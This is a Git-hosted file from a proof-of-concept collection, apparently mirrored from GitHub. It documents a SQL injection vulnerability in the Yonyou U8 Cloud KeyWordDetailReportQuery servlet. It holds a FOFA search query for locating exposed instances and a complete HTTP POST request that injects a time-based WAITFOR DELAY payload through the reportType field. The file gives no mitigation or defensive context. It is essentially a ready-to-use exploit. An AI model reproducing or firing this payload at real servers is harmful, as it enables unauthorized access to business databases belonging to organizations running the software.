admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-05-05 10:17:57 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/用友OA/用友U8_cloud_KeyWordDetailReportQuery_SQL注入漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

468 B
Raw Blame History

用友U8_cloud_KeyWordDetailReportQuery_SQL注入漏洞

fofa

app="用友U8 Cloud"

poc

POST /servlet/~iufo/nc.itf.iufo.mobilereport.data.KeyWordDetailReportQuery  HTTP/1.1
host:127.0.0.1

{"reportType":"';WAITFOR DELAY '0:0:5'--","usercode":"18701014496","keyword":[{"keywordPk":"1","keywordValue":"1","keywordIndex":1}]}

19d957a16fb12f9edddbd99a2dbd081a